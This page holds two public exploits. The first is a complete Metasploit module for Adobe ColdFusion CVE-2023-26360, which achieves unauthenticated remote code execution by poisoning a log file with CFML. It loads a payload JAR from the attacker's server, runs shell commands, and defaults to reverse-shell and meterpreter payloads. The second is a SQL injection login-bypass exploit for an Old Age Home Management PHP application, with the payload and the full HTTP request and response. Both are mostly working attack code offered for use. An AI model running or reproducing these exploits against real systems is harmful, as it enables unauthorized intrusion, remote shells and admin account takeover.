<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Adobe ColdFusion Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe<br /> ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in<br /> order to gain remote code execution.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sf', # MSF Exploit & Rapid7 Analysis<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-26360'],<br /> ['URL', 'https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis']<br /> ],<br /> 'DisclosureDate' => '2023-03-14',<br /> 'Platform' => %w[java win linux unix],<br /> 'Arch' => [ARCH_JAVA, ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => true, # Code execution as 'NT AUTHORITY\SYSTEM' on Windows and 'nobody' on Linux.<br /> 'WfsDelay' => 30,<br /> 'Targets' => [<br /> [<br /> 'Generic Java',<br /> {<br /> 'Type' => :java,<br /> 'Platform' => 'java',<br /> 'Arch' => [ ARCH_JAVA ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'java/meterpreter/reverse_tcp'<br /> }<br /> },<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Type' => :cmd,<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'<br /> }<br /> },<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Type' => :dropper,<br /> 'Platform' => 'win',<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'CmdStagerFlavor' => [ 'certutil', 'psh_invokewebrequest' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Type' => :cmd,<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_perl'<br /> }<br /> },<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Type' => :dropper,<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64],<br /> 'CmdStagerFlavor' => [ 'curl', 'wget', 'bourne', 'printf' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> # The following artifacts will be left on disk:<br /> # The compiled CFML class generated from the poisoned coldfusion-out.log (Note: the hash number will vary)<br /> # * Windows: C:\ColdFusion2021\cfusion\wwwroot\WEB-INF\cfclasses\cfcoldfusion2dout2elog376354580.class<br /> # * Linux: /opt/ColdFusion2021/cfusion/wwwroot/WEB-INF/cfclasses/cfcoldfusion2dout2elog181815836.class<br /> # If a dropper payload was used, a file with a random name may be left.<br /> # * Windows: C:\Windows\Temp\XXXXXX.exe<br /> # * Linux: /tmp/XXXXXX<br /> ARTIFACTS_ON_DISK,<br /> # The following logs will contain IOCs:<br /> # C:\ColdFusion2021\cfusion\logs\coldfusion-out.log<br /> # C:\ColdFusion2021\cfusion\logs\exception.log<br /> # C:\ColdFusion2021\cfusion\logs\application.log<br /> IOC_IN_LOGS<br /> ],<br /> 'RelatedModules' => [<br /> 'auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360'<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8500),<br /> OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),<br /> OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']),<br /> OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => '/'<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> # We cannot identify the ColdFusion version through a generic technique. Instead we use the Recog fingerprint<br /> # to match a ColdFusion cookie, and use this information to detect ColdFusion as being present.<br /> # https://github.com/rapid7/recog/blob/main/xml/http_cookies.xml#L69<br /><br /> if res.get_cookies =~ /(CFCLIENT_[^=]+|CFGLOBALS|CFID|CFTOKEN)=|.cfusion/<br /> return CheckCode::Detected('ColdFusion detected but version number is unknown.')<br /> end<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> unless datastore['CFC_ENDPOINT'].end_with?('.cfc')<br /> fail_with(Failure::BadConfig, 'The CFC_ENDPOINT must point to a .cfc file')<br /> end<br /><br /> case target['Type']<br /> when :java<br /> # Start the HTTP server<br /> start_service<br /><br /> # Trigger a loadClass request via java.net.URLClassLoader<br /> trigger_urlclassloader<br /><br /> # Handle the payload...<br /> handler<br /> when :cmd<br /> execute_command(payload.encoded)<br /> when :dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def on_request_uri(cli, _req)<br /> if target['Type'] == :java<br /> print_status('Received payload request, transmitting payload jar...')<br /><br /> send_response(cli, payload.encoded, {<br /> 'Content-Type' => 'application/java-archive',<br /> 'Connection' => 'close',<br /> 'Pragma' => 'no-cache'<br /> })<br /> else<br /> super<br /> end<br /> end<br /><br /> def trigger_urlclassloader<br /> # Here we construct a CFML payload to load a Java payload via URLClassLoader.<br /><br /> # NOTE: If our URL ends with / a XXX.class is loaded, if no trailing slash then a JAR is expected to be returned.<br /><br /> cf_url = Rex::Text.rand_text_alpha_lower(4)<br /><br /> srvhost = datastore['SRVHOST']<br /><br /> # Ensure SRVHOST is a routable IP address to our RHOST.<br /> if Rex::Socket.addr_atoi(srvhost) == 0<br /> srvhost = Rex::Socket.source_address(rhost)<br /> end<br /><br /> # Create a URL pointing back to our HTTP server.<br /> cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>"<br /><br /> cf_reflectarray = Rex::Text.rand_text_alpha_lower(4)<br /><br /> # Get a reference to java.lang.reflect.Array so we can create a URL[] instance.<br /> cfc_payload << "<cfset #{cf_reflectarray} = createObject('java','java.lang.reflect.Array')/>"<br /><br /> cf_array = Rex::Text.rand_text_alpha_lower(4)<br /><br /> # Create a URL[1] instance.<br /> cfc_payload << "<cfset #{cf_array} = #{cf_reflectarray}.newInstance(#{cf_url}.getClass(),1)/>"<br /><br /> # Set the first element in the array to our URL.<br /> cfc_payload << "<cfset #{cf_reflectarray}.set(#{cf_array},0,#{cf_url})/>"<br /><br /> cf_loader = Rex::Text.rand_text_alpha_lower(4)<br /><br /> # Create a URLClassLoader instance.<br /> cfc_payload << "<cfset #{cf_loader} = createObject('java','java.net.URLClassLoader').init(#{cf_array},javaCast('null',''))/>"<br /><br /> # Load the remote JAR file and instantiate an instance of metasploit.Payload.<br /> cfc_payload << "<cfset #{cf_loader}.loadClass('metasploit.Payload').newInstance().main(javaCast('null',''))/>"<br /><br /> execute_cfml(cfc_payload)<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> cf_param = Rex::Text.rand_text_alpha_lower(4)<br /><br /> # If the cf_param is present in the HTTP requests www-form encoded data then proceed with the child tags.<br /> cfc_payload = "<cfif IsDefined('form.#{cf_param}') is 'True'>"<br /><br /> # Set our cf_param with the data in the requests form data, this is the command to run.<br /> cfc_payload << "<cfset #{cf_param}=form.#{cf_param}/>"<br /><br /> # Here we construct a CFML payload to stage the :cmd and :dropper commands...<br /> shell_name = nil<br /> shell_arg = nil<br /><br /> case target['Platform']<br /> when 'win'<br /> shell_name = 'cmd.exe'<br /> shell_arg = '/C'<br /> when 'linux', 'unix'<br /> shell_name = '/bin/sh'<br /> shell_arg = '-c'<br /> end<br /><br /> cf_array = Rex::Text.rand_text_alpha_lower(4)<br /><br /> # Create an array of arguments to pass to exec()<br /> cfc_payload << "<cfset #{cf_array}=['#{shell_name}','#{shell_arg}',#{cf_param}]/>"<br /><br /> cf_runtime = Rex::Text.rand_text_alpha_lower(4)<br /><br /> # Get a reference to the java.lang.Runtime class.<br /> cfc_payload << "<cfobject action='create' type='java' class='java.lang.Runtime' name='#{cf_runtime}'/>"<br /><br /> # Call the static Runtime.exec method to execute our string array holding the command and the arguments.<br /> cfc_payload << "<cfset #{cf_runtime}.getRuntime().exec(#{cf_array})/>"<br /><br /> # The end of the If tag.<br /> cfc_payload << '</cfif>'<br /><br /> execute_cfml(cfc_payload, cf_param, cmd)<br /> end<br /><br /> def execute_cfml(cfml, param = nil, param_data = nil)<br /> cfc_payload = '<cftry>'<br /><br /> cfc_payload << cfml<br /><br /> cfc_payload << "<cfcatch type='any'>"<br /><br /> cfc_payload << '</cfcatch>'<br /><br /> cfc_payload << '<cffinally>'<br /><br /> # Clear the CF_LOGFILE which will contain this CFML code. We need to do this so we can repeatedly execute commands.<br /> # GetCurrentTemplatePath returns 'C:\ColdFusion2021\cfusion\wwwroot\..\logs\coldfusion-out.log' as this is the<br /> # template we are executing.<br /> cfc_payload << "<cffile action='write' file='#GetCurrentTemplatePath()#' output=''></cffile>"<br /><br /> cfc_payload << '</cffinally>'<br /><br /> cfc_payload << '</cftry>'<br /><br /> # We can only log ~950 characters to a log file before the output is truncated, so we enforce a limit here.<br /> unless cfc_payload.length < 950<br /> fail_with(Failure::BadConfig, 'The CFC payload is too big to fit in the log file')<br /> end<br /><br /> # We dont need to call a valid CFC method, so we just create a random method name to supply to the server.<br /> cfc_method = Rex::Text.rand_text_alpha_lower(1..8)<br /><br /> # Perform the request that writes the cfc_payload to the CF_LOGFILE.<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['CFC_ENDPOINT']),<br /> 'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },<br /> 'vars_post' => { '_variables' => "{#{cfc_payload}" }<br /> )<br /><br /> unless res && res.code == 200 && res.body.include?('<title>Error</title>')<br /> fail_with(Failure::UnexpectedReply, 'Failed to plant the payload in the ColdFusion output log file')<br /> end<br /><br /> # The relative path from wwwroot to the CF_LOGFILE.<br /> cflog_file = datastore['CF_LOGFILE']<br /><br /> # To construct the arbitrary file path from the attacker provided class name, we must insert 1 or 2 characters<br /> # to satisfy how coldfusion.runtime.JSONUtils.convertToTemplateProxy extracts the class name.<br /> if target['Platform'] == 'win'<br /> classname = "#{Rex::Text.rand_text_alphanumeric(1)}#{cflog_file.gsub('/', '\\')}"<br /> else<br /> classname = "#{Rex::Text.rand_text_alphanumeric(1)}/#{cflog_file}"<br /> end<br /><br /> json_variables = "{\"_metadata\":{\"classname\":#{classname.to_json}},\"_variables\":[]}"<br /><br /> vars_post = { '_variables' => json_variables }<br /><br /> unless param.nil? || param_data.nil?<br /> vars_post[param] = param_data<br /> end<br /><br /> # Perform the request that executes the CFML we wrote to the CF_LOGFILE, while passing the shell command to be<br /> # executed as a parameter which will in turn be read back out by the CFML in the cfc_payload.<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['CFC_ENDPOINT']),<br /> 'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },<br /> 'vars_post' => vars_post<br /> )<br /><br /> unless res && res.code == 200 && res.body.include?('<title>Error</title>')<br /> fail_with(Failure::UnexpectedReply, 'Failed to execute the payload in the ColdFusion output log file')<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code>## Title: Old Age Home Management-2022-2023-1.0<br />SQLi-Bypass-Authentication-Account-Take-Over<br />## Author: nu11secur1ty<br />## Date: 04.29.2023<br />## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/<br />## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette<br />## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass<br /><br /><br />## Description:<br />The username parameter appears to be vulnerable to SQL injection<br />attacks. The payloads nu11secur1ty' or 1=1# or<br />nu11secur1ty%27+or+1%3D1%23 were each submitted in the username<br />parameter. These two requests resulted in different responses,<br />indicating that the input is being incorporated into a SQL query in an<br />unsafe way. The attacker easily can take control over the admin<br />account and then everything will be lost for this app and the users<br />who are using it.<br /><br />STATUS: CRITICAL<br /><br />[+]Exploit:<br />```MYSQL<br />POST /oahms/admin/login.php HTTP/1.1<br />Host: pwnedhost.com<br />Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg<br />Content-Length: 62<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://pwnedhost.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://pwnedhost.com/oahms/admin/login.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=<br />```<br />[+]Responce:<br />```HTTP<br />HTTP/1.1 200 OK<br />Date: Sat, 29 Apr 2023 05:32:07 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0<br />Content-Security-Policy: upgrade-insecure-requests;<br />X-Powered-By: PHP/8.2.0<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 13518<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><br /><head><br /><br /> <title>Old Age Home Management System|| Dashboard</title><br /> <!-- base:css --><br /> <link rel="stylesheet" href="vendors/typicons/typicons.css"><br /> <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css"><br /> <link rel="stylesheet" href="css/vertical-layout-light/style.css"><br /> <!-- endinject --><br /><br /></head><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0)<br /><br />## Proof and Exploit<br />[href](https://streamable.com/qtj0bz)<br /><br />## Time spend:<br />00:30:00<br /><br /><br /></code></pre>